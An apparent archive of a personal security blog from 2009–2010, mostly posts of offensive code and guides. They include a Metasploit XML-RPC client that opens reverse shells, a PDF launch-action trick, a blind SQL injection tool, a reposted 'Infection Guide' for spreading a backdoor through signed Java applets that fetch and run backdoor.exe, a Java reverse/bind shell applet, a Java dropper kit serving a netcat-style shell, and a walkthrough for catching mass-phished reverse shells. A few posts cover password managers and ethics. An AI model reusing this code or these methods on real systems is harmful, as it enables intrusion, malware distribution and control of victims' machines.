alternative system re:configurations

python metasploit xmlrpc interface 1.0

2010-06-16T14:51:00.003-04:00


#!/usr/bin/python

import xmlrpclib
class MSFTransport(xmlrpclib.Transport):
    """Handles an transaction to the MetasploitXML-RPC server."""

    # client identifier (may be overridden)
    def __init__(self, use_datetime=0):
        self._use_datetime = use_datetime
    def request(self, host, handler, request_body, verbose=0):
        # issue XML-RPC request
        c = self.make_connection(host)
        if verbose:
            h.set_debuglevel(1)
        self.send_content(c, request_body)
        self.verbose = verbose
        return self._parse_response(None, c)

    def make_connection(self, host):
        import socket
        addr = host.split(":")
        inetaddr = (addr[0],int(addr[1]))
        c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        c.connect(inetaddr)
        return c
    def send_content(self, connection, request_body):
        if request_body:
            connection.send(request_body + "\0")
    def _parse_response(self, file, sock):
        # read response from input file/socket, and parse it
        p, u = self.getparser()
        while 1:
            if sock:
                response = sock.recv(1024)
            else:
                response = file.read(1024)
            if not response:
                break
            if response.endswith("\0")  :
                response = response.rstrip("\0\n")
                p.feed(response.encode("utf-8"))
                break;
            else:
                p.feed(response.encode("utf-8"))

        if file:
                file.close()
        p.close()

        return u.close()
################################
from time import sleep
import base64
import xmlrpclib
#import MSFTransport
msftransport = MSFTransport()
proxy = xmlrpclib.ServerProxy("http://127.0.0.1:55553", transport=msftransport)

ret = proxy.auth.login("msf","test")
if ret['result'] == 'success':
        token = ret['token']
else:
        print "Could not login\n"

opts = {
        "RHOST" : "192.168.1.1",
        "LHOST" : "127.0.0.1",
        "LPORT" : 4444,
        "PAYLOAD": "windows/shell_reverse_tcp"}
print "Running exploit now"
ret = proxy.module.execute(token,"exploit","multi/handler",opts)
if(ret['result'] == 'success'):
        print "Exploit sucessful...waiting on session"
sleep(25)
session_list =  proxy.session.list(token)
x = session_list.keys()

def s_io(s):
        while 1:
         w = raw_input("shell> ")
         if w == "exit":
                break
         write = w + "\n"
         n = proxy.session.shell_write(token,s,base64.b64encode(write))
         read = proxy.session.shell_read(token,s)
         print  base64.b64decode(read['data'])

if session_list != {} and session_list[x[0]]['type'] == 'shell':
        s =  int(x[0])
        s_io(s)

exe2vba.py

2010-04-30T20:00:00.000-04:00

import struct
import os
import binascii
import win32com.client
import time

idx = 0
n = 0
maxbytes = 2000
payload_vba_file = "payload.vba"

exe_name = "putty.exe"
size = os.path.getsize(exe_name)
exe = open(exe_name)
final_bytes = ""
print "Writing Document ",
while (idx < size):
exe.seek(idx)
c = binascii.b2a_hex(exe.read(1))
# print ("&H%2s" % c.upper()),
exe_byte = ("&H%2s" % c.upper())
final_bytes = final_bytes +exe_byte
idx = idx + 1
if (idx%2000 == 0):
print "\bX\b",
time.sleep(.1)
if (idx%2000 == 1000):
print "\bO\b",
time.sleep(.1)
print final_bytes
fh = open(payload_vba_file,'w')
fh.write(final_bytes)
fh.close()

PDF execute code w/o javascript

2010-03-31T08:41:00.003-04:00

example code from http://blog.didierstevens.com/2010/03/29/escape-from-pdf/

%PDF-1.1

1 0 obj
<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction 8 0 R
>>
endobj

2 0 obj
<<
/Type /Outlines
/Count 0
>>
endobj

3 0 obj
<<
/Type /Pages
/Kids [4 0 R]
/Count 1
>>
endobj

4 0 obj
<<
/Type /Page
/Parent 3 0 R
/MediaBox [0 0 612 792]
/Contents 5 0 R
/Resources
<< /ProcSet 6 0 R
/Font << /F1 7 0 R >>
>>
>>
endobj

5 0 obj
<< /Length 46 >>
stream
BT
/F1 24 Tf
100 700 Td
(Hello World)Tj
ET
endstream
endobj

6 0 obj
[/PDF /Text]
endobj

7 0 obj
<<
/Type /Font
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Encoding /MacRomanEncoding
>>
endobj

8 0 obj
<<
/Type /Action
/S /Launch
/Win
<<
/F (calc.exe)
/P (\nTo continue viewing the encrypted content\nplease click the “Don’t show this message again” box\nand press OK!)
>>
>>
endobj

xref
0 9
0000000000 65535 f
0000000012 00000 n
0000000109 00000 n
0000000165 00000 n
0000000234 00000 n
0000000401 00000 n
0000000505 00000 n
0000000662 00000 n
trailer
<<
/Size 9
/Root 1 0 R
>>
startxref
751
%%EOF

metasploit xmlrpc stub

2009-12-04T19:42:00.000-05:00

# xmlrpc interface to metasploit

import xmlrpclib
import socket
import telnetlib
from xml.dom import minidom

tn = telnetlib.Telnet("127.0.0.1",55553)
s = tn.get_socket()

params = ( 'msf', 'test' )
tuple_params = tuple([params])

xmlrpccall = xmlrpclib.dumps(params, 'auth.login',None,'UTF-8')
i = xmlrpccall.replace('\n','')

tn.write(i+"\n\0")
data = s.recv(2048)

data = data.replace('\n\0','')
#print data
n = minidom.parseString(data)

print n.toxml()
print n.childNodes[0].toxml()
print n.childNodes[0].childNodes[0].childNodes[0].childNodes[0].childNodes[0].childNodes[1].childNodes[1].childNodes[0].firstChild.data

patch to import_burp.rb

2009-11-18T10:44:00.002-05:00

small update to import_burp.rb script from Jonathan Voris to deal with recent changes in burp log format

*** import_burp.rb Mon Oct 26 14:13:09 2009
--- import_burp2.rb Wed Nov 18 10:38:59 2009
***************
*** 51,57 ****
hostRegex = /(http|https)?:\/\/(\S+):(\d+)/
#From http://www.regular-expressions.info/examples.html
ipAddrRegex = /\[(\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b)\]/
! methodRegex = /(HEAD|GET|POST|PUT|DELETE|TRACE|OPTIONS|CONNECT) \/([^\?]*)\?*(\S*) /
responseRegex = /^HTTP\/\d.\d (\d\d\d)/

#Open the database file
--- 51,58 ----
hostRegex = /(http|https)?:\/\/(\S+):(\d+)/
#From http://www.regular-expressions.info/examples.html
ipAddrRegex = /\[(\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b)\]/
! methodRegex = /(HEAD|GET|POST|PUT|DELETE|TRACE|OPTIONS|CONNECT) .*\/([^\?]*)\?*(\S*) /
! removeJunkRegex = /UTF\-\d+/
responseRegex = /^HTTP\/\d.\d (\d\d\d)/

#Open the database file
***************
*** 193,198 ****
--- 194,202 ----
puts("Skipping this entry: neither the host name nor the IP address match the specified target.")
else
#set the values in the query
+
+ responseBody.gsub!(removeJunkRegex, "")
+
dbQuery.bind_param("host", ipAddr)
dbQuery.bind_param("port", port)
dbQuery.bind_param("ssl", ssl)

python binary file patch script

2009-11-02T21:57:00.003-05:00


#!/usr/bin/python
"""
simple script to patch a binary file
"""
import sys,os
from binascii import *
import re
def read_bytes(filename,start_address,number_of_bytes):
    fh = open(filename,'rb')
    fh.seek(start_address)
    data = fh.read(number_of_bytes)
    fh.close()
    return hexlify(data)
def replace_bytes(filename,search,replace):
    output = filename + ".patched"
    o = open(output,wb)
    data = open(filename).read() 
    o.write(re.sub(a2b_hex(search),a2b_hex(replace),data) )
    o.close()
def write_bytes(filename,start_address,newbytes):
    output = filename + ".patched"   
    fh = open(output,'wb')
    newbytes_hex = a2b_hex(newbytes)
    bytesize  = len(newbytes_hex)/2  #read data up to the start address
    end_address = start_address + bytesize
    for i in open(filename,'rb').read():
        t = fh.tell()
        if t < start_address or t > end_address: 
            fh.write(i)
            #print fh.tell()
        else:
            fh.write(newbytes_hex)
            #print  "patched " + output +" with " + newbytes + " starting at " + hex(t) 
    fh.flush()
    fh.close()
def main(name,address,bytes):
    size = len(bytes)/2
    print "before " + read_bytes(name,address,size)
    write_bytes(name,address,bytes)
    print "after  " + read_bytes(name+".patched",address,size)
if __name__ == "__main__":
    f = "test.exe"   
    a = 0x0003113
    w = "DEADBEEF"  
    main(f,a,w)

sqlninja mod

2009-10-05T11:08:00.001-04:00

sub fingerprint_db (diff)
{
my $word1 = "if ascii(substring((select db_name()),";
my $word2 = ",1)) < ";
my $word3 = " waitfor delay '0:0:".$blindtime."';";

my $len1 = "if (select len(db_name())) < ";
my $len2 = " waitfor delay '0:0:".$blindtime."';";

local $/=\1;
local $|=1;

print "[+] Checking whether we are in master db...\n";
$query = "if not(select db_name()) <> 'master' waitfor delay '0:0:"
.$blindtime."'";
}
#####################
sub fingerprint_tables
{
my $minlen = 0;
my $maxlen = 30;
my $len = -1;
my $candidate;
my $query;
my $delay;
my $number_of_tables2 = " waitfor delay '0:0:".$blindtime."';";

my $number_of_tables = "if (SELECT LTRIM(STR(COUNT(name))) FROM sysobjects WHERE xtype IN ('u', 'v')) < "; #### expect an interation after this

my $word1 = "if ascii(substring(( SELECT TOP 1 name FROM sysobjects WHERE xtype IN ('u', 'v') AND name NOT IN (SELECT TOP "; ### expect $number of tables
my $word15 = " name FROM sysobjects WHERE xtype IN ('u', 'v') ORDER BY name ASC) ORDER BY name ASC), ";
my $word2 = ",1)) < ";
my $word3 = " waitfor delay '0:0:".$blindtime."';";
my $size;
local $/=\1;
local $|=1;

###############
$delay = 0; $len = 30;
################
if ($delay > ($blindtime - 2)) {
print " We seem to be in the master db :)\n";
return 1;
} else {
print " Getting the number of tables\n";
print "[+] Finding tables length... \n";
my $number = 0; #set the start number of dbs
while ($number < $maxlen) {
$query = $number_of_tables.$number.$number_of_tables2;
$delay=tryblind($query);
if ($delay < $blindtime - 2) {
$number++;
} else {
$size = $number -1;
$number=$maxlen;
}
}

print " Got it ! There are ".$size." tables \n";
print "[+] Now going for the tablenames........\n";
my $asciinum = -1;
my $charnum;
my $minchar;
my $maxchar;
my $tb_num;
my $no_of_tb;
### set no of tables == $len
$no_of_tb = $len;
for ($tb_num=0;$tb_num<=$no_of_tb;$tb_num++) {
print " Name of table ".$tb_num." is....: ";
#### loop through each table

for ($charnum=1; $charnum<=$len; $charnum++) {
$minchar=32;
$maxchar=126;
while ($asciinum < 0 ) {
$candidate = int(($minchar+$maxchar)/2);
$query=$word1.$tb_num.$word15.$charnum.$word2.$candidate.$word3;
$delay=tryblind($query);
if (($maxchar-$minchar) > 1) {
if ($delay < $blindtime - 2) {
$minchar=$candidate;
} else {
$maxchar=$candidate;
}
if ($minchar==$maxchar) {
$asciinum=$minchar;
}
} else {
if ($delay < $blindtime - 2) {
$asciinum=$maxchar-1;
} else {
$asciinum=$minchar;
}
}
}
### if you see this char number stop
if ($asciinum == 125) {
print "\n";
return 0;

}
printf("%c",$asciinum);
#print($asciinum);
$asciinum=-1;
}
print "\n";
} ### end while
return 0;
} ### end for
} ### end for

Infection Guide Using Java/VbScript

2009-09-16T21:14:00.002-04:00

########################################################################
# IGUJV - Infection Guide Using Java/VbScript
########################################################################
#
# Hi. This is a minimalistic guide on "how to infect anyone".
# This is not a 0day. It's a pwning method wich is one click away
# from the victim. It is pretty simple and the best of all
# it takes no time at all. (And it is undetectable too if you do it right)
#
########################################################################
#
# Author: AnalyseR
# eMaiL: alienyser@gmail.com
# Greetz to: DarkPaiN, Marianaki_Ki, Franko, Aragorn, __Potter__, Santa_Cruz
#
########################################################################

After a few attempts to think a way to infect specific (or any) computer systems,
i found that Java could be THE solution. I am not a Java Programmer/Developer or whatever
but this piece of code is pretty easy to be read by anyone who had a little programming
expirience. The question "how to infect someone" is the hardest one, when you are coding
your new backdoor/trojan or whatever malware. I mean... ok, you have your new backdoor
compiled. You've tested it and it works great. But how the hell can you spread it???
There are several methods, but nothing is invisible from the user's eye. And that's because
all the well known methods are... WELL KNOWN :)

Ok, let me go with the subject and show you how it's done. I've developed the 80%
of this attack (at least) and i say 80 because the backdoor server i use isn't made by me,
and the vbscript is from a googled page. Anyway, the Java code has been written by me and
the "idea" is also my "product". So be gentle with this :PpPPp.

I won't explain the meaning of what does every single line of code here, because
i don't want to and because you must understand by your self how it works. Any other
explanation on the codes, will be useless if you can't read the source code by your self.
(I speak English by my self for example :Pp noone teached me how it's done. It just happens.)
(Little crappy but i hope you understand anywayz)

####What you need to play with this method ######################
1) The official Java compiler (and the rest of Java developer tools)
2) Basic HTML/Java/VBScripting knowledge
3) Java Runtimes
4) Web Browser
5) Hosting for the tests
6) A backdoor uploaded to your host
7) Mind
8) Coffee

#############################################################################

The process
###########################################################################

1) Create a java file with the following code inside and name it whatever you want
(i faced problems with the THIRD parameter, cut it to the second one or just use it as it is.
Works fine for me...).

########################### START COPY HERE ##############################

import java.applet.*;
import java.awt.*;
import java.io.*;
public class skata extends Applet {
public void init() {
Process f;
String first = getParameter("first");
try{
f = Runtime.getRuntime().exec(first);

}
catch(IOException e){
e.printStackTrace();
}
Process s;
String second = getParameter("second");
try{
s = Runtime.getRuntime().exec(second);
}
catch(IOException e){
e.printStackTrace();
}
Process t;
String third = getParameter("third");
try{
t = Runtime.getRuntime().exec(third);
}
catch(IOException e){
e.printStackTrace();
}
}
}

########################### END COPY HERE ##############################

2) Compile your java applet with the java developer tools and sign it too.
A good name could be "Microsoft Corporation" or something.
3) Upload your signed/compiled applet to your host and your backdoor too.
4) Open notepad and paste the following html code.
(change the YOUR-JAVA-APPLET-NAME with your own java filename)

########################### START COPY HERE ##############################

########################### END COPY HERE ##############################

5) Upload it as .htm to your host and browse it :) You will see the Java Security warning.
Click RUN.... BooM! Calculator and cmd spawned!
6) Have in mind that THIS warning comes out in EVERY java applet you are running. EITHER A
JAVA GAME or a JAVA IRC CLIENT.
7) Change the .htm code in to something like the following (Take a look, it's a vbscript
echoed from cmd.exe - this will download our backdoor).

########################### START COPY HERE ##############################

C:\windows\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\apsou.vbs &
echo Dim BinaryStream >> C:\windows\apsou.vbs & echo Set BinaryStream =
CreateObject("ADODB.Stream") >> C:\windows\apsou.vbs & echo BinaryStream.Type =
adTypeBinary >> C:\windows\apsou.vbs & echo BinaryStream.Open >> C:\windows\apsou.vbs &
echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\apsou.vbs &
echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >>
C:\windows\apsou.vbs & echo Function BinaryGetURL(URL) >> C:\windows\apsou.vbs &
echo Dim Http >> C:\windows\apsou.vbs & echo Set Http =
CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\apsou.vbs &
echo Http.Open "GET", URL, False >> C:\windows\apsou.vbs & echo Http.Send >>
C:\windows\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\apsou.vbs &
echo End Function >> C:\windows\apsou.vbs & echo Set shell = CreateObject("WScript.Shell") >>
C:\windows\apsou.vbs & echo shell.Run "C:\windows\update.exe" >> C:\windows\apsou.vbs &
start C:\windows\apsou.vbs http://hello.world.com/backdoor.exe C:\windows\update.exe'>

########################### END COPY HERE ##############################

8) Note that i use C:\Windows. If you want to infect win2k or vista you might want to
change it to %windir% or whatever you want.
9) To see the vbscript code clearly, infect your self and open C:\windows\apsou.vbs ;)))
(you don't need to do it at all).
10) Change the backdoor URL on the above html code (http://hello.world.com/backdoor.exe) and
the location you want to download it.
11) Fill the page with flash games, pictures, texts. This will keep the victim's mind away ;)
12) Save your new .htm and upload....
13) Now browse it and wait. Wait.. wait.. BOOM! :) Backdoored.
14) You trust an irc client? :) You can be pwned. Without to mention anything. Just by clicking
run.
15) If you want some roots, you can change the above script to attack linux users only.
(Or you can make 2 different versions)
16) Use it with XSS to infect a lot of people.
17) Use <script src=""> to include the script, don't let the people see what's inside your page. Remember to change the permissions to.18) Use multiple unescape functions for your code. This will keep away any suspicious users for a while.

CONCLUSION:
##############
It's big mistake to think that you are safe with your new antivirus or your brand new million dollar anti-whatever system. This is not any kind of exploitation. It's just social engineering-like attack. I see 10 of these warnings every day on the net.
Either i want to play a game and kill my time or whatever i want to do with a java applet. It's nothing strange or special than that. But hello, there is a "hole" on this. You can execute LOCAL, anything you want

Tested (and working) under Windows XP SP2-SP3, Full Updated, Java Runtimes 5-something...
Proof of concept: http://analyser.overflow.gr/basta/analyser.htm
Enjoy milw0rmers..

# milw0rm.com [2008-12-12]

Password lists for WPA/WPA2 cracking

2009-09-04T20:52:00.001-04:00

Wireless cracking password lists

The easiest way is do an Internet search for word lists and dictionaries. Also check out web sites for password cracking tools. Many times they have references to word lists. A few sources follow. Please add comments or additions to this thread: http://forum.aircrack-ng.org/index.php?topic=1373.0.

Here are a few resources to build your own lists. There are many, many more available if you search the Internet.

Etemenanki is a shell script that “builds word dictionnaries based on remote and local (hyper)text repositories”.
Associative Word List Generator allows you to build custom lists based on a “root” word.
Password Generator is a program that generates all the variations of a string of characters based on the length of the string.
Password Generator is a program that goes through standard and arbitrary permutations of strings.

@ffxp system reconfiguration // friday 8/28/2009

2009-08-27T19:39:00.005-04:00

security recommendation for this week:

If you use keypass on your desktop, (you are using a password manager right?), then you can easily store those passwords on your mobile device.

Keepass for the blackberry: http://sourceforge.net/projects/keepassbb/
Keepass J2ME http://sourceforge.net/projects/keepassj2me/

so easy a 9 year old can do it

2009-08-20T12:48:00.005-04:00

From time to time I get questions from my son about ethical hacking, penetration testing, lock picking and the like. It has always been important for me emphasize the "ethical" and legal components of these activities.

For example, one day the swimming pool was unexpectedly closed and locked with a padlock. He has seen me pick these types of locks for the better part of his life. However he respects the rules posted and knows the picking the lock to get in would likely be against the law. More importantly he knows that the lock provides little to no security against criminals or vandals.

I've recently began showing him how to spot simple web application vulnerabilities using test applications on a private network. He was able to perform his first authentication bypass using a forgot password function in the application. I'm proud of him but know I have a to continue re-enforcing his positive sense of ethics and concern for others.

java applet bindshell / reverseshell

2009-07-24T16:26:00.005-04:00

mostly not my code, inspiration from valsmith, hdm, etc...

/*
<html>
<head></head>
<body>
<applet archive="SecurityApplet.jar" code="SecurityApplet.class" width="1 height=">
<param name="rhost" value="10.1.1.1">
<param name="rport" value="4444">
</applet>
</body>
</html>
*/

import java.io.*;
import java.net.*;
import java.applet.Applet;
import java.io.ByteArrayInputStream;
import java.io.ObjectInputStream;

public class SecurityApplet extends Applet
{

public static String data = null;

public void init()
{
try
{

String rport = getParameter("RPORT");
String rhost = getParameter("RHOST");

Socket clientSocket = null;
ServerSocket serverSocket = null;
String os = System.getProperty( "os.name" );
String shell = "/bin/sh";
if( os.indexOf( "Windows" ) >= 0 )
shell = "cmd.exe";

try {

if (rhost == null && rport != null) {
serverSocket = new ServerSocket(Integer.parseInt(rport));
clientSocket = serverSocket.accept();
}
if ( rhost != null && rport != null ) {
clientSocket = new Socket(rhost,Integer.parseInt(rport));
} else {
rport = "4444";
serverSocket = new ServerSocket(Integer.parseInt(rport));
clientSocket = serverSocket.accept();
}

if (clientSocket != null) {

Process proc = Runtime.getRuntime().exec( shell );

PrintWriter out = new PrintWriter(clientSocket.getOutputStream(), true);
shellthread output = new shellthread(proc.getInputStream(), clientSocket.getOutputStream());
shellthread input = new shellthread(clientSocket.getInputStream(), proc.getOutputStream());

output.start();
input.start();
}
// serverSocket.close();
// clientSocket.close();
}
catch(NumberFormatException nfe)
{
System.out.println("nfe: " + nfe);
}
catch(IOException ioe)
{
System.out.println("ioe2: " + ioe);
}

}
catch( Exception e ) {}
}
//////////////////////////////////////////
private class shellthread extends Thread
{
InputStream inps;
OutputStream outs;
shellthread(InputStream inps, OutputStream outs)
{
this.inps = inps;
this.outs = outs;
}
public void run()
{
BufferedReader bufr = null;
BufferedWriter bufw = null;
try
{
bufr = new BufferedReader(new InputStreamReader(inps));
bufw = new BufferedWriter(new OutputStreamWriter(outs));
char buffer[] = new char[8192];
int lenRead;

while((lenRead = bufr.read(buffer, 0, buffer.length)) != -1)
{
bufw.write(buffer, 0, lenRead);
bufw.flush();
}
}
catch(Exception ioe)
{
System.out.println("ioe3: " + ioe);
}

try
{
if(bufr != null) bufr.close();
if(bufw != null) bufw.close();
}
catch (IOException ioe)
{
System.out.println("ioe4: " + ioe);
}
}
}
///////////////////////////////////

}

2009-07-21T16:16:00.002-04:00

#!/usr/bin/python

"""
this is based on val smith pre-metaphish stuff. And of course python roughly corrisponds to the Aitel book of style
"""

import os,socket

class jvd ():

def __init__(self):
self.localurl =" "
self.iName = " "
self.certName = " "
self.command = " "
self.command_args = " "
self.base_name = "update" # base java file name
self.java_name = self.base_name + ".java"
self.class_name = self.base_name + ".class" #class extension
self.unsigned_jarname = self.base_name + "_unsigned_.jar" #jar extenstion
self.signed_jarname = self.base_name + ".jar"

def write_file(self,name, data):
fh = open(name, 'w')
fh.write(data)
fh.close
print "[*] wrote to " + name

def jcode(self,command,command_args,filename):
javacode = \
'import java.applet.Applet;' +"\n" \
'import java.io.*;' + "\n"\
'import java.net.*;'+"\n" \
'import java.io.IOException;'+"\n" \
'public class update extends Applet {' + "\n"\
'public update() { }' +"\n" \
'public void init() { downloadURL(); cmd();'+"\n" \
'} /* end public void init */'+"\n" \
'public void downloadURL() {'+"\n" \
'OutputStream out = null;'+"\n" \
'URLConnection conn = null;'+"\n" \
'InputStream in = null;'+"\n" \
'try {'+"\n" \
'String geturi = getParameter("URI");'+"\n" \
'URL url = new URL(geturi);'+"\n" \
'String localfile = getParameter("LOCALFILE");'+"\n" \
'if (localfile == null) { localfile = "'+ command + '";}' "\n" \
'out = new BufferedOutputStream('+"\n" \
'new FileOutputStream(localfile));'+"\n" \
'conn = url.openConnection();'+"\n" \
'in = conn.getInputStream();'+"\n" \
'byte[] buffer = new byte[1024];'+"\n" \
'int numRead;'+"\n" \
'long numWritten = 0;'+"\n" \
'while ((numRead = in.read(buffer)) != -1) {'+"\n" \
'out.write(buffer, 0, numRead);'+"\n" \
'numWritten += numRead;'+"\n" \
'} /* end while */'+"\n" \
'} /* end try */'+"\n" \
'catch (Exception exception) {'+"\n" \
'exception.printStackTrace();'+"\n" \
'} /* end catch */'+"\n" \
'finally {'+"\n" \
'try {'+"\n" \
'if (in != null) {'+"\n" \
'in.close();'+"\n" \
'} /* end if */'+"\n" \
'if (out != null) {'+"\n" \
'out.close();'+"\n" \
'} /* end if */'+"\n" \
'} /* end try */'+"\n" \
'catch (IOException ioe) { }'+"\n" \
'} /* end finally */'+"\n" \
'} /* end public void downloadURL */'+"\n" \
'public void cmd() {'+"\n" \
'Process process;'+"\n" \
'try {'+"\n" \
'process = Runtime.getRuntime().exec("cmd.exe /c ' + command + ' ' + command_args + '");'+"\n" \
'} /* end try */'+"\n" \
'catch(IOException ioexception) { }'+"\n" \
'} /* end public void cmd */'+"\n" \
'} /* end public class */' +"\n"
self.write_file(filename,javacode)

def sign(self,signed_jar,unsigned_jar,cert):
signer = "cn=" + cert
cmd0 = "keytool -genkey -alias signFiles " + \
"-keystore tkeystore -storepass tstorepass -dname "+ signer + " -keypass tkeypass"

cmd1 = "jarsigner -keystore tkeystore " + \
"-storepass tstorepass -keypass tkeypass -signedjar " + signed_jar + " " + unsigned_jar +" signFiles"

print "[*] executing " + cmd0
os.system(cmd0)
print "[*] executing " + cmd1
os.system(cmd1)

def servit(self):
import SimpleHTTPServer
# = 8888
SimpleHTTPServer.test()

def javac(self,java_name,class_name):
javac_cmd = "javac "+ java_name
os.system(javac_cmd)
print "[*] compiled " + java_name + " to classfile " + class_name

def jarit(self,jarfile,classfile):
jar_cmd = "jar -cvf "+ jarfile + " " + classfile
print "[*] compressing " + jarfile
os.system(jar_cmd)

def icode(self,filename,localurl):
iframecode = \
'<html>' \
'<body>' \
'<APPLET code="update.class" ' + \
'archive="'+ "update.jar" + '" width="1" height="1">' \
'<PARAM NAME="URI" VALUE="'+localurl +' ">' \
'</APPLET>' \
'</body>' \
'</html>'
self.write_file(filename,iframecode)

def run(self):

self.icode(self.iName,self.localurl)
self.jcode(self.command,self.command_args,self.java_name)
self.javac(self.java_name, self.class_name)
self.jarit(self.unsigned_jarname,self.class_name)
self.sign(self.signed_jarname,self.unsigned_jarname,self.certName)
self.servit()

if __name__ == '__main__':

print "[*] inititiating java dropper kit"
local_ip_address = socket.gethostbyname(socket.gethostname())
app = jvd()
app.base_name = "update"
app.localurl = "http://"+ local_ip_address +":8000/sbd.exe"
app.certName = "\"cert\""
app.command = "c:\\\d.exe"
app.command_args = " -lp 1234 -e cmd.exe"
app.iName = "index.html"
app.run()

using old msf code for fun

2009-07-21T16:04:00.002-04:00

Using socketNinja.pl with the Metasploit Framework
http://justfriends4n0w.blogspot.com/2006/01/using-socketninjapl-with-metasploit.html

Say you want to use an exploit using the Metasploit framework to get a reverse shell, but you don’t want to have the exploit exit when it is done. For example, there are some web browser vulnerabilities. It would be nice to run the exploit (which emulates a web server), send out a URL that contains a link to your (metasploit created) web server, and then send out a thousand e-mails which point people to it. Then, you would want to be able to track the connections that came back and interact with them as needed…

That is the capability that socketNinja.pl provides.

Basic concepts and terminology:

socketNinja machine: The computer you are running socketNinja.pl (probably the same machine you are running Metasploit to accomplish exploits, but not necessarily.)

Listener: This is a port on your socketNinja machine that is listening. A regular listener is a port that you will redirect reverse shells to.

Attached Listener: port on your socketNinja machine that you telnet into in order to access the shell on the remote host.

Server: This is the remote host which you have compromised.

Client: This machine is connected up to the remote host by telneting or connecting to the attached listener. This is the machine which you are typing commands on to be executed on the remote machine.

Client->socketNinja machine attached listener <-socketNinja Listener <- server

The following commands are available:

help Shows you all of the commands
help command Shows you help on each command
l Lists your connections
as Adds a server
ar Adds a random attached Listener
li Creates a listener
run Launches a program on an attached Listener
set Sets a config value
sc Prints configuration settings
wc writes the configuration settings to a file
q Quits

1, If you are on Windows, launch the Cygshell command. In Linux just get a shell. Navigate to the Metasploit Framework/home/framework/tools directory.

2. run socketNinja.pl

perl socketNinja.pl –d

You can use any port on your machine that is not currently being used.

3, launch msfconsole

4. Set up an exploit to use socketNinja.pl

use ie_xp_pfv_reverse
set NinjaDontKill 1
set LHOST
set LPORT

set PAYLOAD win32_reverse
exploit
(I left the HTTPPORT at the default of 8080.)

According to the Metasploit User Guide you can also use NinjaHost and NinjaPort to redirect all communications from an exploit to the host running a SocketNinja listener.

5. In the shell you are running socketNinja.pl look at your connections by typing l.

You will see a listing of all your listeners, and who is connected up to them,

The machines you have exploited are listed under the Server column. The listener you created is in the listener column. Note that each listener has a number. Each server has a number as well. So, the first machine you exploited has a listener # of 0 and a server # of 0. The second machine you exploited has a listener # of 0 and a server # of 1, etc. For now, I am only going to use a single listener with a listener # of 0.

What you need to do is create an Attached Listener to your server. This will be a port on your own machine that if you telnet to it (or use nc or whatever) will give you a shell on your exploited machine. The easiest way to do this is using the ar command which will attach a listener to a random port. The format for the ar command is

ar [listener #] [server #]

ar 0 0

This command will print out the local port that it has attached a listener on. For example it will print out something like:

* new listener (5) bound to 127.0.0.1 5217

Alternatively, you could create a listener on the port of your choosing by using the ac command. The syntax for this is

ac [listener #] [server #] [ip:]

So, to create an attached listener on port 5217 this would work:

ac 0 0 127.0.0.1 5217

6. nc or telnet into your Attached listener

telnet 127.0.0.1 5217
or
nc –v 127.0.0.1 5217

So, in the end, we have something that looks like this:

Client->socketNinja machine attached listener (in this case port 5127 on 127.0.0.1) <-socketNinja Listener (in this case 192.168.13.1 50) <- server (in this case 192.168.13.2)

Final notes:

Apparently, you cannot use SocketNinja.pl with staged payloads. But you can use it with the bind payload or the reverse shell payloads.

You may want to create multiple listeners. For example, you may have one listener to which you send Windows exploits to and a second listener to which you send Linux exploits to. Then you have an easy way to get find all the Windows exploited hosts for example to target with some other stuff.

When you are finally connected up to your server and you have a shell, tying exit will kill the shell on the compromised machine. This is probably not what you want to do. Exit your sessions by hitting control-c in nc or using control-[ and then using the quit command in telnet.

joanna // daily dave

2009-07-14T20:43:00.001-04:00

Sure, but there is a difference between "understanding exploits" and being an
exploit fetishist.

Some time ago I attended a security conference well known for having very
technical audience. I was told the majority of those people are up to date with
all the recent advances in exploitation techniques -- heap overflows, getting
around ASRL/NX, etc. But when I started my lecture, which was about Trusted
Computing, it turned the number of people who knew how TPM works was... close to
zero! And we're talking about some real basic stuff here, nothing fancy like
TXT. Just what a PCR register is, and what are the advantages of trusted boot.

I actually read recently an interview with a well know researcher, who I
actually respect myself, who happily announced that he's protecting his laptop
using an FDE software, and, to make it more secure, he's powering it down as
often as possible (in order to mitigate possibility of cold-boot attacks).
Interestingly, he didn't realize he actually makes it much easier for even a
hotel maid to get his encryption key... This is so basic and yet have nothing to
do with advanced exploit understanding.

Now, who do you think can provide more security into an organization, like e.g.
a bank -- a heap-overflow ninja that can bypass ASLR on the most recent Vista,
or a person who would realize that maybe it is worth buying a
trusted-boot-supported full disk encryption (FDE) software, as otherwise it
would be trivial for the *real* adversary to get around it? Or a person that can
tell you that your employees should use 2 different desktop computers and would
be able to decide how to split tasks and activities between the two?

Sure, experience in exploit writing is sometimes crucial. Probably it is of the
utmost important to e.g. OS kernel architects, who might attempt to build in all
the anti-exploitation technologies into the OS (which is what they do in fact).
Or to processor and chipset vendors. This requires great understanding of
possible workarounds.

It is also important for governments for obvious reasons.

But very few people are OS kernel architects and governments offensive teams.
And the further you go, the less you need those extreme skills, which is exploit
writing as it is today. If you are only a *consumer* of computer products (e.g.
a bank, or an airport), then I really see no reason why you should even be able
to understand the difference between a heap overflow vs. stack overflow. You
just need to understand what a shellcode is and what it can potentially do (i.e.
everything). You should understand that SELinux will not provide you all the
promised features, because it has big monolithic TCB (the Linux kernel) that
represents a huge attack vector. But you don't need to know how to write an
exploit for SELinux. etc.

joanna.

> On Tue, Jul 14, 2009 at 3:07 PM, Joanna
> Rutkowska wrote:
>> dave wrote:
>>> People (this means you) like to think hard about game changing events in
>>> the world of hacking. But just staying on the treadmill of exploit after
>>> exploit can be a game changing event.
>>>
>>> For example, today you may have noticed that Intevydis
>>> (http://www.intevydis.com/vulndisco.shtml) released as part of their
>>> latest exploit pack, some exploits for all the major access
>>> point/mini-router firmwares. Not CSRF "exploits" or XSS "exploits". I
>>> mean "Here's a shell, now you get to install new programs and muck with
>>> the router's configuration" exploits.
>>>
